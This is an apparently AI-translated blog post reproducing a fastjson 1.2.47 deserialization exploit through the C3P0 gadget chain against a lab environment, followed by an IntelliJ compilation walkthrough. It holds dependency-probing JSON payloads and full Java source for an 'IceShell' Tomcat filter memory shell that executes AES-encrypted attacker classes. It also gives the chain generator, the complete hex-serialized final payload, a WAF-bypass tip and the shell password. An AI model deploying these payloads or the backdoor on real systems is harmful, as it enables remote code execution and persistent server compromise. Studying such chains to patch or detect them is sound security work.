banner
lca

lca

真正的不自由,是在自己的心中设下牢笼。
HomeArchives图文

fastjson vulnerability reproduction - 1247 - waf - c3p0

#漏洞复现31
AI Translation
This post is translated from Chinese into English through AI.View Original
AI-generated summary
The document discusses the exploitation of a vulnerability in a Java application, specifically focusing on the FastJson library and its interaction with the C3P0 connection pool. It outlines the process of reproducing the vulnerability, emphasizing the importance of understanding the exploitation flow, especially for beginners. Key points include: 1. **Vulnerability Detection**: The author captures login packets and identifies the presence of a SpringBoot class, indicating the application framework in use. 2. **Dependency Exploration**: The document details how to probe dependencies by triggering character conversion errors to reveal existing libraries. 3. **Exploitation Techniques**: It highlights various exploitation methods, particularly focusing on in-memory payloads that do not require external network access, using hex base double deserialization. 4. **Example Code**: The author provides a sample Java filter class (`IceShell`) designed to execute arbitrary code when a POST request is made, demonstrating how to manipulate the class loader for exploitation. Overall, the document serves as a practical guide for understanding and reproducing the vulnerability in a controlled environment.

Exploit#

Reference: https://github.com/lemono0/FastJsonParty/blob/main/1247-waf-c3p0/write-up.md

Focus on reproducing a process to understand the exploit flow. Many articles by experts online are well-written, but they are not sufficient for foundational learning (especially regarding how to compile Java files using IDEA, how to resolve dependencies, and other basic issues, -__-|). Therefore, I will document my own reproduction process.

Capture the login packet

Pasted image 20250106153558

{
  "@type": "java.lang.AutoCloseable"

Pasted image 20250106153703

1.2.47 has a mappings cache bypass that can be exploited through JNDI, with the following conditions for JNDI exploitation:

  1. Generally requires an external network environment
  2. Subject to JDK version restrictions

This environment does not have external network access, so JNDI exploitation is not possible.

Therefore, for this environment, we need to first probe dependencies. By causing a Character conversion error, we can determine what dependencies exist.

{
  "x": {
    "@type": "java.lang.Character"{
  "@type": "java.lang.Class",
  "val": "org.springframework.web.bind.annotation.RequestMapping"
		}
	}

Pasted image 20250106154130

RequestMapping itself is a class under SpringBoot. When this class exists, a type conversion error will be thrown, indicating it is a SpringBoot project.

Otherwise, it cannot be displayed.

Pasted image 20250106154238

After testing, the service has a C3P0 dependency.

{
  "x": {
    "@type": "java.lang.Character"{
  "@type": "java.lang.Class",
  "val": "com.mchange.v2.c3p0.DataSources"
		}
	}

Pasted image 20250106154406

FastJson combined with C3P0 has many exploitation methods, among which the most mentioned is the non-external network exploitation, hex base second deserialization to inject a memory shell.

Find a filter-type memory shell; the Java file content is as follows:

import com.sun.org.apache.xalan.internal.xsltc.DOM;  
import com.sun.org.apache.xalan.internal.xsltc.TransletException;  
import com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet;  
import com.sun.org.apache.xml.internal.dtm.DTMAxisIterator;  
import com.sun.org.apache.xml.internal.serializer.SerializationHandler;  
import org.apache.catalina.Context;  
import org.apache.catalina.core.ApplicationFilterConfig;  
import org.apache.catalina.core.StandardContext;  
import org.apache.catalina.loader.WebappClassLoaderBase;  
import org.apache.tomcat.util.descriptor.web.FilterDef;  
import org.apache.tomcat.util.descriptor.web.FilterMap;  
import sun.misc.BASE64Decoder;  
  
import javax.crypto.Cipher;  
import javax.crypto.spec.SecretKeySpec;  
import javax.servlet.*;  
import javax.servlet.http.HttpServletRequest;  
import javax.servlet.http.HttpServletResponse;  
import javax.servlet.http.HttpSession;  
import java.io.IOException;  
import java.lang.reflect.Constructor;  
import java.lang.reflect.Field;  
import java.lang.reflect.Method;  
import java.util.Base64;  
import java.util.HashMap;  
import java.util.Map;  
  
public class IceShell extends AbstractTranslet implements Filter {  
    private final String pa = "3ad2fddfe8bad8e6";  
  
    public IceShell() {  
    }  
  
    public void init(FilterConfig filterConfig) throws ServletException {  
    }  
  
    public void doFilter(ServletRequest servletRequest, ServletResponse servletResponse, FilterChain filterChain) throws IOException, ServletException {  
        HttpServletRequest request = (HttpServletRequest)servletRequest;  
        HttpServletResponse response = (HttpServletResponse)servletResponse;  
        HttpSession session = request.getSession();  
        Map<String, Object> pageContext = new HashMap();  
        pageContext.put("session", session);  
        pageContext.put("request", request);  
        pageContext.put("response", response);  
        ClassLoader cl = Thread.currentThread().getContextClassLoader();  
        if (request.getMethod().equals("POST")) {  
            Class Lclass;  
            if (cl.getClass().getSuperclass().getName().equals("java.lang.ClassLoader")) {  
                Lclass = cl.getClass().getSuperclass();  
                this.RushThere(Lclass, cl, session, request, pageContext);  
            } else if (cl.getClass().getSuperclass().getSuperclass().getName().equals("java.lang.ClassLoader")) {  
                Lclass = cl.getClass().getSuperclass().getSuperclass();  
                this.RushThere(Lclass, cl, session, request, pageContext);  
            } else if (cl.getClass().getSuperclass().getSuperclass().getSuperclass().getName().equals("java.lang.ClassLoader")) {  
                Lclass = cl.getClass().getSuperclass().getSuperclass().getSuperclass();  
                this.RushThere(Lclass, cl, session, request, pageContext);  
            } else if (cl.getClass().getSuperclass().getSuperclass().getSuperclass().getSuperclass().getName().equals("java.lang.ClassLoader")) {  
                Lclass = cl.getClass().getSuperclass().getSuperclass().getSuperclass().getSuperclass();  
                this.RushThere(Lclass, cl, session, request, pageContext);  
            } else if (cl.getClass().getSuperclass().getSuperclass().getSuperclass().getSuperclass().getSuperclass().getName().equals("java.lang.ClassLoader")) {  
                Lclass = cl.getClass().getSuperclass().getSuperclass().getSuperclass().getSuperclass().getSuperclass();  
                this.RushThere(Lclass, cl, session, request, pageContext);  
            } else {  
                Lclass = cl.getClass().getSuperclass().getSuperclass().getSuperclass().getSuperclass().getSuperclass().getSuperclass();  
                this.RushThere(Lclass, cl, session, request, pageContext);  
            }  
  
            filterChain.doFilter(servletRequest, servletResponse);  
        }  
    }  
  
    public void destroy() {  
    }  
  
    public void RushThere(Class Lclass, ClassLoader cl, HttpSession session, HttpServletRequest request, Map<String, Object> pageContext) {  
        byte[] bytecode = Base64.getDecoder().decode("yv66vgAAADQAGgoABAAUCgAEABUHABYHABcBAAY8aW5pdD4BABooTGphdmEvbGFuZy9DbGFzc0xvYWRlcjspVgEABENvZGUBAA9MaW5lTnVtYmVyVGFibGUBABJMb2NhbFZhcmlhYmxlVGFibGUBAAR0aGlzAQADTFU7AQABYwEAF0xqYXZhL2xhbmcvQ2xhc3NMb2FkZXI7AQABZwEAFShbQilMamF2YS9sYW5nL0NsYXNzOwEAAWIBAAJbQgEAClNvdXJjZUZpbGUBAAZVLmphdmEMAAUABgwAGAAZAQABVQEAFWphdmEvbGFuZy9DbGFzc0xvYWRlcgEAC2RlZmluZUNsYXNzAQAXKFtCSUkpTGphdmEvbGFuZy9DbGFzczsAIQADAAQAAAAAAAIAAAAFAAYAAQAHAAAAOgACAAIAAAAGKiu3AAGxAAAAAgAIAAAABgABAAAAAgAJAAAAFgACAAAABgAKAAsAAAAAAAYADAANAAEAAQAOAA8AAQAHAAAAPQAEAAIAAAAJKisDK763AAKwAAAAAgAIAAAABgABAAAAAwAJAAAAFgACAAAACQAKAAsAAAAAAAkAEAARAAEAAQASAAAAAgAT");  
  
        try {  
            Method define = Lclass.getDeclaredMethod("defineClass", byte[].class, Integer.TYPE, Integer.TYPE);  
            define.setAccessible(true);  
            Class uclass = null;  
  
            try {  
                uclass = cl.loadClass("U");  
            } catch (ClassNotFoundException var18) {  
                uclass = (Class)define.invoke(cl, bytecode, 0, bytecode.length);  
            }  
  
            Constructor constructor = uclass.getDeclaredConstructor(ClassLoader.class);  
            constructor.setAccessible(true);  
            Object u = constructor.newInstance(this.getClass().getClassLoader());  
            Method Um = uclass.getDeclaredMethod("g", byte[].class);  
            Um.setAccessible(true);  
            String k = "3ad2fddfe8bad8e6";  
            session.setAttribute("u", k);  
            Cipher c = Cipher.getInstance("AES");  
            c.init(2, new SecretKeySpec(k.getBytes(), "AES"));  
            byte[] eClassBytes = c.doFinal((new BASE64Decoder()).decodeBuffer(request.getReader().readLine()));  
            Class eclass = (Class)Um.invoke(u, eClassBytes);  
            Object a = eclass.newInstance();  
            Method b = eclass.getDeclaredMethod("equals", Object.class);  
            b.setAccessible(true);  
            b.invoke(a, pageContext);  
        } catch (Exception var19) {  
        }  
    }  
  
    public void transform(DOM document, SerializationHandler[] handlers) throws TransletException {  
    }  
  
    public void transform(DOM document, DTMAxisIterator iterator, SerializationHandler handler) throws TransletException {  
    }  
  
    static {  
        try {  
            String name = "AutomneGreet";  
            WebappClassLoaderBase webappClassLoaderBase = (WebappClassLoaderBase)Thread.currentThread().getContextClassLoader();  
            StandardContext standardContext = (StandardContext)webappClassLoaderBase.getResources().getContext();  
            Field Configs = Class.forName("org.apache.catalina.core.StandardContext").getDeclaredField("filterConfigs");  
            Configs.setAccessible(true);  
            Map filterConfigs = (Map)Configs.get(standardContext);  
            if (filterConfigs.get("AutomneGreet") == null) {  
                Filter filter = new IceShell();  
                FilterDef filterDef = new FilterDef();  
                filterDef.setFilter(filter);  
                filterDef.setFilterName("AutomneGreet");  
                filterDef.setFilterClass(filter.getClass().getName());  
                standardContext.addFilterDef(filterDef);  
                FilterMap filterMap = new FilterMap();  
                filterMap.addURLPattern("/shell");  
                filterMap.setFilterName("AutomneGreet");  
                filterMap.setDispatcher(DispatcherType.REQUEST.name());  
                standardContext.addFilterMapBefore(filterMap);  
                Constructor constructor = ApplicationFilterConfig.class.getDeclaredConstructor(Context.class, FilterDef.class);  
                constructor.setAccessible(true);  
                ApplicationFilterConfig filterConfig = (ApplicationFilterConfig)constructor.newInstance(standardContext, filterDef);  
                filterConfigs.put("AutomneGreet", filterConfig);  
            }  
        } catch (Exception var10) {  
        }  
    }  
}

Compile to generate the class file.

Normally, you can compile using javac IceShell.java, but this will throw a bunch of errors due to missing various dependencies. Instead, you can use IDEA to compile, generating the file IceShell.class, referring to subsequent articles for compilation content.

The above IceShell file is a memory shell, and next, we need the C3P0 deserialization chain.

The final content of the C3P0 chain is as follows:

import com.alibaba.fastjson.JSONArray;  
import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;  
  
import javax.management.BadAttributeValueExpException;  
import java.io.ByteArrayOutputStream;  
import java.io.IOException;  
import java.io.ObjectOutputStream;  
import java.lang.reflect.Field;  
import java.nio.file.Files;  
import java.nio.file.Paths;  
import java.util.HashMap;  
  
public class Test {  
    public static void main(String[] args) throws Exception {  
        String hex2 = bytesToHex(tobyteArray(gen()));  
        String FJ1247 = "{\n" +  
                "    \"a\":{\n" +  
                "        \"@type\":\"java.lang.Class\",\n" +  
                "        \"val\":\"com.mchange.v2.c3p0.WrapperConnectionPoolDataSource\"\n" +  
                "    },\n" +  
                "    \"b\":{\n" +  
                "        \"@type\":\"com.mchange.v2.c3p0.WrapperConnectionPoolDataSource\",\n" +  
                "        \"userOverridesAsString\":\"HexAsciiSerializedMap:" + hex2 + ";\",\n" +  
                "    }\n" +  
                "}\n";  
        System.out.println(FJ1247);  
    }  
    // FastJson native deserialization loads malicious class bytecode  
    public static Object gen() throws Exception {  
        TemplatesImpl templates = TemplatesImpl.class.newInstance();  
        byte[] bytes = Files.readAllBytes(Paths.get("/Users/xxx/pentesting/javasec/FRain/out/production/FRain/IceShell.class")); // Read the bytecode of the previously created memory shell  
        setValue(templates, "_bytecodes", new byte[][]{bytes});  
        setValue(templates, "_name", "1");  
        setValue(templates, "_tfactory", null);  
  
        JSONArray jsonArray = new JSONArray();  
        jsonArray.add(templates);  
  
        BadAttributeValueExpException bd = new BadAttributeValueExpException(null);  
        setValue(bd,"val",jsonArray);  
  
        HashMap hashMap = new HashMap();  
        hashMap.put(templates,bd);  
        return hashMap;  
    }  
    public static void setValue(Object obj, String name, Object value) throws Exception{  
        Field field = obj.getClass().getDeclaredField(name);  
        field.setAccessible(true);  
        field.set(obj, value);  
    }  
  
    // Serialize the class to a byte array  
    public static byte[] tobyteArray(Object o) throws IOException {  
        ByteArrayOutputStream bao = new ByteArrayOutputStream();  
        ObjectOutputStream oos = new ObjectOutputStream(bao);  
        oos.writeObject(o);   //  
        return bao.toByteArray();  
    }  
  
    // Convert byte array to hexadecimal  
    public static String bytesToHex(byte[] bytes) {  
        StringBuffer stringBuffer = new StringBuffer();  
        for (int i = 0; i < bytes.length; i++) {  
            String hex = Integer.toHexString(bytes[i] & 0xff);      // bytes[] contains signed bytes -255~+255, &0xff: ensure the data is between 0~255  
            if (hex.length()<2){  
                stringBuffer.append("0" + hex);   // For 0-9, prepend '0' to ensure 2 digits to avoid reading errors later  
            }else {  
                stringBuffer.append(hex);  
            }  
        }  
        return stringBuffer.toString();  
    }  
}

Similarly, create a Test.java file in src, resolve dependency issues in the same way, and then right-click to run this file.

Pasted image 20250106172200

The output is as follows:

Pasted image 20250106172228

This is the final payload.

{
    "a":{
        "@type":"java.lang.Class",
        "val":"com.mchange.v2.c3p0.WrapperConnectionPoolDataSource"
    },
    "b":{
        "@type":"com.mchange.v2.c3p0.WrapperConnectionPoolDataSource",
        "userOverridesAsString":"HexAsciiSerializedMap:aced0005737200116a6176612e7574696c2e486173684d61700507dac1c31660d103000246000a6c6f6164466163746f724900097468726573686f6c6478703f4000000000000c770800000010000000017372003a636f6d2e73756e2e6f72672e6170616368652e78616c616e2e696e7465726e616c2e78736c74632e747261782e54656d706c61746573496d706c09574fc16eacab3303000649000d5f696e64656e744e756d62657249000e5f7472616e736c6574496e6465785b000a5f62797465636f6465737400035b5b425b00065f636c6173737400125b4c6a6176612f6c616e672f436c6173733b4c00055f6e616d657400124c6a6176612f6c616e672f537472696e673b4c00115f6f757470757450726f706572746965737400164c6a6176612f7574696c2f50726f706572746965733b787000000000ffffffff757200035b5b424bfd19156767db37020000787000000001757200025b42acf317f8060854e00200007870000024dccafebabe0000003401870a005e00cb0800cc09004b00cd0700ce0700cf0b000400d00700d10a000700cb08007e0b004900d208007a08007c0a00d300d40a00d300d50b000400d60800d70a00d800d90a002400da0a001c00db0a001c00dc0800dd0a004b00de0b00df00e00a00e100e20800e30a00e400e50800e60700e70700a30900e800e90a001c00ea0a00eb00ec0800ed0a002700ee0700ef0700f00a00e800f10a00eb00f20700f30a001c00f40a00f500ec0a001c00f60a00f500f70800f808009c0b00f900fa0800fb0a00fc00fd0700fe0a00d800ff0a003101000a00fc01010701020a003500cb0b000401030a010401050a003501060a00fc01070a001c010808010907010a08010b07010c0a003f010d0b010e010f0701100801110a001c01120800c80a001c01130a011400ec0a011401150701160b004901150701170a004b00cb0701180a004d00cb0a004d01190a004d011a0a004d011b0a0042011c07011d0a005300cb08011e0a0053011f0a0053011a09012001210a012001220a005301230a0042012407012507012607012707012801000270610100124c6a6176612f6c616e672f537472696e673b01000d436f6e7374616e7456616c75650100063c696e69743e010003282956010004436f646501000f4c696e654e756d6265725461626c650100124c6f63616c5661726961626c655461626c650100047468697301000a4c4963655368656c6c3b010004696e697401001f284c6a617661782f736572766c65742f46696c746572436f6e6669673b295601000c66696c746572436f6e66696701001c4c6a617661782f736572766c65742f46696c746572436f6e6669673b01000a457863657074696f6e73070129010008646f46696c74657201005b284c6a617661782f736572766c65742f536572766c6574526571756573743b4c6a617661782f736572766c65742f536572766c6574526573706f6e73653b4c6a617661782f736572766c65742f46696c746572436861696e3b29560100064c636c6173730100114c6a6176612f6c616e672f436c6173733b01000e736572766c65745265717565737401001e4c6a617661782f736572766c65742f536572766c6574526571756573743b01000f736572766c6574526573706f6e736501001b4c6a617661782f736572766c65742f46696c746572436861696e3b010007726571756573740100274c6a617661782f736572766c65742f687474702f48747470536572766c6574526571756573743b010008726573706f6e73650100284c6a617661782f736572766c65742f687474702f48747470536572766c6574526573706f6e73653b01000773657373696f6e0100204c6a617661782f736572766c65742f687474702f4874747053657373696f6e3b01000b70616765436f6e7465787401000f4c6a6176612f7574696c2f4d61703b010002636c0100174c6a6176612f6c616e672f436c6173734c6f616465723b0100164c6f63616c5661726961626c65547970655461626c650100354c6a6176612f7574696c2f4d61703c4c6a6176612f6c616e672f537472696e673b4c6a6176612f6c616e672f4f626a6563743b3e3b01000d537461636b4d61705461626c6507011707012a07012b07012c0700ce0700cf07012d0701160700f30700e707012e01000764657374726f79010009527573685468657265010081284c6a6176612f6c616e672f436c6173733b4c6a6176612f6c616e672f436c6173734c6f616465723b4c6a617661782f736572766c65742f687474702f4874747053657373696f6e3b4c6a617661782f736572766c65742f687474702f48747470536572766c6574526571756573743b4c6a617661782f736572766c65742f46696c746572436861696e3b295601000576617231380100224c6a6176612f6c616e672f436c6173734e6f74466f756e64457863657074696f6e0100106a6176612f6c616e672f4f626a6563740c015301540c015501560100156a6176612f6c616e672f436c6173734c6f616465720c015701580701590c015a01390c015b015c0100016707012d0c015d015e01000341455307015f0c0160016101001f6a617661782f63727970746f2f737065632f5365637265744b6579537065630c016201630c006301640c006a016501001673756e2f6d6973632f4241534536344465636f6465720c016601670701680c0169013b0c016a014a0c016b016c0c015b016d010006657175616c730100136a6176612f6c616e672f457863657074696f6e01000c4175746f6d6e6547726565740100306f72672f6170616368652f636174616c696e612f6c6f616465722f576562617070436c6173734c6f61646572426173650c016e016f0701700c017101720100286f72672f6170616368652f636174616c696e612f636f72652f5374616e64617264436f6e746578740100286f72672e6170616368652e636174616c696e612e636f72652e5374616e64617264436f6e746578740c017301520c017401750701760c0177017801000d6a6176612f7574696c2f4d61700100084963655368656c6c01002f6f72672f6170616368652f746f6d6361742f7574696c2f64657363726970746f722f7765622f46696c7465724465660c0179017a0c017b017c0c017d017c0c017e017f01002f6f72672f6170616368652f746f6d6361742f7574696c2f64657363726970746f722f7765622f46696c7465724d61700100062f7368656c6c0c0180017c0701810c018201830c00c1013b0c0184017c0c018501860100306f72672f6170616368652f636174616c696e612f636f72652f4170706c69636174696f6e46696c746572436f6e66696701001b6f72672f6170616368652f636174616c696e612f436f6e74657874010040636f6d2f73756e2f6f72672f6170616368652f78616c616e2f696e7465726e616c2f78736c74632f72756e74696d652f41627374726163745472616e736c65740100146a617661782f736572766c65742f46696c74657201001e6a617661782f736572766c65742f536572766c6574457863657074696f6e01001c6a617661782f736572766c65742f536572766c65745265717565737401001d6a617661782f736572766c65742f536572766c6574526573706f6e73650100196a617661782f736572766c65742f46696c746572436861696e01001e6a617661782f736572766c65742f687474702f4874747053657373696f6e0100136a6176612f696f2f494f457863657074696f6e0100186a6176612f6c616e672f7265666c6563742f4d6574686f64010039636f6d2f73756e2f6f72672f6170616368652f78616c616e2f696e7465726e616c2f78736c74632f5472616e736c6574457863657074696f6e01000a67657453657373696f6e01002228294c6a617661782f736572766c65742f687474702f4874747053657373696f6e3b010003707574010038284c6a6176612f6c616e672f4f626a6563743b4c6a6176612f6c616e672f4f626a6563743b294c6a6176612f6c616e672f4f626a6563743b0100106a6176612f6c616e672f54687265616401000d63757272656e7454687265616401001428294c6a6176612f6c616e672f5468726561643b010015676574436f6e74657874436c6173734c6f6164657201001928294c6a6176612f6c616e672f436c6173734c6f616465723b0100096765744d6574686f6401001428294c6a6176612f6c616e672f537472696e673b0100106a6176612f6c616e672f537472696e67010015284c6a6176612f6c616e672f4f626a6563743b295a010008676574436c61737301001328294c6a6176612f6c616e672f436c6173733b01000d6765745375706572636c6173730100076765744e616d65010040284c6a617661782f736572766c65742f536572766c6574526571756573743b4c6a617661782f736572766c65742f536572766c6574526573706f6e73653b29560100106a6176612f7574696c2f42617365363401000a6765744465636f6465720100074465636f64657201000c496e6e6572436c617373657301001c28294c6a6176612f7574696c2f426173653634244465636f6465723b0100186a6176612f7574696c2f426173653634244465636f6465720100066465636f6465010016284c6a6176612f6c616e672f537472696e673b295b420100116a6176612f6c616e672f496e7465676572010004545950450100116765744465636c617265644d6574686f64010040284c6a6176612f537472696e673b5b4c6a6176612f6c616e672f436c6173733b294c6a6176612f6c616e672f7265666c6563742f4d6574686f643b01000d73657441636365737369626c65010004285a29560100096c6f6164436c617373010025284c6a6176612f537472696e673b294c6a6176612f6c616e672f436c6173733b01000776616c75654f660100162849294c6a6176612f6c616e672f496e74656765723b010006696e766f6b65010039284c6a6176612f6c616e672f4f626a6563743b5b4c6a6176612f6c616e672f4f626a6563743b294c6a6176612f6c616e672f4f626a6563743b0100166765744465636c61726564436f6e7374727563746f72010033285b4c6a6176612f6c616e672f436c6173733b294c6a6176612f6c616e672f7265666c6563742f436f6e7374727563746f723b01001d6a6176612f6c616e672f7265666c6563742f436f6e7374727563746f7201000e676574436c6173734c6f6164657201000b6e6577496e7374616e6365010027285b4c6a6176612f6c616e672f4f626a6563743b294c6a6176612f6c616e672f4f626a6563743b01000c736574417474726962757465010027284c6a6176612f6c616e672f537472696e673b4c6a6176612f6c616e672f4f626a6563743b29560100136a617661782f63727970746f2f43697068657201000b676574496e7374616e6365010029284c6a6176612f6c616e672f537472696e673b294c6a617661782f63727970746f2f4369706865723b010008676574427974657301000428295b42010017285b424c6a6176612f6c616e672f537472696e673b295601001728494c6a6176612f73656375726974792f4b65793b295601000967657452656164657201001a28294c6a6176612f696f2f42756666657265645265616465723b0100166a6176612f696f2f4275666665726564526561646572010008726561644c696e6501000c6465636f6465427566666572010007646f46696e616c010006285b42295b4201001428294c6a6176612f6c616e672f4f626a6563743b01000c6765745265736f757263657301002728294c6f72672f6170616368652f636174616c696e612f5765625265736f75726365526f6f743b0100236f72672f6170616368652f636174616c696e612f5765625265736f75726365526f6f7401000a676574436f6e7465787401001f28294c6f72672f6170616368652f636174616c696e612f436f6e746578743b010007666f724e616d650100106765744465636c617265644669656c6401002d284c6a6176612f537472696e673b294c6a6176612f7265666c6563742f4669656c643b0100176a6176612f7265666c6563742f4669656c64010003676574010026284c6a6176612f4f626a6563743b294c6a6176612f4f626a6563743b01000973657446696c746572010019284c6a617661782f736572766c65742f46696c7465723b295601000d73657446696c7465724e616d65010015284c6a6176612f6c616e672f537472696e673b295601000e73657446696c746572436c61737301000c61646446696c746572446566010034284c6f72672f6170616368652f746f6d6361742f7574696c2f64657363726970746f722f7765622f46696c7465724465663b295601000d61646455524c5061747465726e01001c6a617661782f736572766c65742f44697370617463686572547970650100075245515545535401001e4c6a617661782f736572766c65742f44697370617463686572547970653b01000d7365744469737061746368657201001261646446696c7465724d61704265666f7265010034284c6f72672f6170616368652f746f6d6361742f7574696c2f64657363726970746f722f7765622f46696c7465724d61703b29560021004b005e0001005f0001001200600061000100620000000200020008000100630064000100650000003d000200010000000b2ab700012a1202b50003b10000000200660000000e00030000001f0004001d000a002000670000000c00010000000b0068006900000001006a006b00020065000000350000000200000001b10000000200660000000600010000002300670000001600020000000100680069000000000001006c006d0001006e000000040001006f00010070007100020065000003180006000a000001ab2bc000043a042cc000053a051904b9000601003a06bb000759b700083a07190712091906b9000a0300571907120b1904b9000a0300571907120c1905b9000a030057b8000db6000e3a081904b9000f01001210b600119901541908b60012b60013b600141215b6001199001e1908b60012b600133a092a19091908190619041907b60016a7011e1908b60012b60013b60013b600141215b600119900211908b60012b60013b600133a092a19091908190619041907b60016a700ea1908b60012b60013b60013b60013b600141215b600119900241908b60012b60013b60013b600133a092a19091908190619041907b60016a700b01908b60012b60013b60013b60013b60013b600141215b600119900271908b60012b60013b60013b60013b600133a092a19091908190619041907b60016a7002a1908b60012b60013b60013b60013b60013b60013b600133a092a19091908190619041907b600162d2b2cb900170300b100000004006600000072001c0000002600060027000c002800150029001e002a002a002b0036002c0042002d004a002e00590030006c00310076003200870033009d003400aa003500bb003600d4003700e4003800f500390111003a0124003b0135003c0154003d016a003e017b00400194004101a2004401aa0047006700000098000f0076001100720073000900aa001100720073000900e4001100720073000901240011007200730009016a001100720073000901940016007200730009000001ab006800690000000001ab007400750001000001ab007600770002000001ab007800790003000601a5007a007b0004000c019f007c007d000500150196007e007f0006001e018d008000810007004a016100820083000800840000000c0001001e018d0080008500070086000000330007ff0087000907008707008807008907008a07008b07008c07008d07008e07008f000033393ffb0045fc0026070090fa0007006e0000000600020091006f000100920064000100650000002b0000000100000001b10000000200660000000600010000006f0067000000200003000000010068006900000000000100af00b000010000000100b100b20002006e00000004000100b3000100ad00b400020065000000490000000400000001b10000000200660000000600010000007200670000002a0004000000010068006900000000000100af00b000010000000100b500b600020000000100b700b80003006e00000004000100b3000800b9006400010065000001da0005000a000000de123e4bb8000db6000ec0003f4c2bb60040b900410100c000424d1243b800441245b600464e2d04b600472d2cb60048c000493a041904123eb9004a0200c7009cbb004b59b7004c3a05bb004d59b7004e3a0619061905b6004f1906123eb6005019061905b60012b60014b600512c1906b60052bb005359b700543a0719071255b600561907123eb600571907b20058b60059b6005a2c1907b6005b125c05bd001c5903125d535904124d53b600283a08190804b60029190805bd002459032c535904190653b6002bc0005c3a091904123e1909b9000a030057a700044bb10001000000d900dc003d000300660000006600190000007600030077000d0078001a00790025007a002a007b0034007c0040007d0049007e0052007f0059008000600081006d008200730083007c008400830085008a008600950087009b008800b0008900b6008a00cd008b00d9008e00dc008d00dd0090006700000066000a0049009000ba00bb00050052008700bc00bd0006007c005d00be00bf000700b00029009a009b000800cd000c006c00c00009000300d600c100610000000d00cc00c200c30001001a00bf00c400c50002002500b400c600c70003003400a500c80081000400860000000a0003fb00d9420700aa00000200c90000000200ca01460000000a000100e400e101450009707400013170770100787372002e6a617661782e6d616e6167656d656e742e42616441747472696275746556616c7565457870457863657074696f6ed4e7daab632d46400200014c000376616c7400124c6a6176612f6c616e672f4f626a6563743b787200136a6176612e6c616e672e457863657074696f6ed0fd1f3e1a3b1cc4020000787200136a6176612e6c616e672e5468726f7761626c65d5c635273977b8cb0300044c000563617573657400154c6a6176612f6c616e672f5468726f7761626c653b4c000d64657461696c4d65737361676571007e00055b000a737461636b547261636574001e5b4c6a6176612f6c616e672f537461636b5472616365456c656d656e743b4c001473757070726573736564457863657074696f6e737400104c6a6176612f7574696c2f4c6973743b787071007e0014707572001e5b4c6a6176612e6c616e672e537461636b5472616365456c656d656e743b02462a3c3cfd22390200007870000000027372001b6a6176612e6c616e672e537461636b5472616365456c656d656e746109c59a2636dd8502000449000a6c696e654e756d6265724c000e6465636c6172696e67436c61737371007e00054c000866696c654e616d6571007e00054c000a6d6574686f644e616d6571007e000578700000002774000454657374740009546573742e6a61766174000367656e7371007e00170000000f71007e001971007e001a7400046d61696e737200266a6176612e7574696c2e436f6c6c656374696f6e7324556e6d6f6469666961626c654c697374fc0f2531b5ec8e100200014c00046c69737471007e00137872002c6a6176612e7574696c2e436f6c6c656374696f6e7324556e6d6f6469666961626c65436f6c6c656374696f6e19420080cb5ef71e0200014c0001637400164c6a6176612f7574696c2f436f6c6c656374696f6e3b7870737200136a6176612e7574696c2e41727261794c6973747881d21d99c7619d03000149000473697a657870000000007704000000007871007e0023787372001e636f6d2e616c69626162612e666173746a736f6e2e4a534f4e417272617900000000000000010200014c00046c69737471007e001378707371007e00220000000177040000000171007e00077878;
    }
}

With the above content, exploitation can proceed.

Directly send the packet, but it gets blocked, filtering the userOverridesAsString. Attempts to bypass using unicode and hex encoding still fail. This environment filters out encoding prefixes like \u, \x in the code.

Pasted image 20250106172429

Using _ or + to process keywords for bypassing, refer to A Brief Discussion on Fastjson Bypassing WAF

Pasted image 20250106172331

Successfully injected the IceShell memory shell, with the password: goautomne.

Pasted image 20250106172509

Java File Compilation#

File - New - Project

Pasted image 20250106170847

Select Java module, next.

Pasted image 20250106170919

Next, fill in the project name FRain.

Pasted image 20250106171010

Click Finish.

Return to the main interface, create a new IceShell.java file under the src directory, right-click src - New - File.

Pasted image 20250106171201

Copy the content of the filter memory shell above.

Pasted image 20250106171127

If dependencies are missing, right-click src - Open Module Settings.

Pasted image 20250106171336

Select Libraries, import the missing jar packages.

Pasted image 20250106171453

After resolving dependencies, you can build by selecting Build - Rebuild to generate the IceShell.class file.

Pasted image 20250106171533

Pasted image 20250106171631

Loading...
Ownership of this post data is guaranteed by blockchain and smart contracts to the creator alone.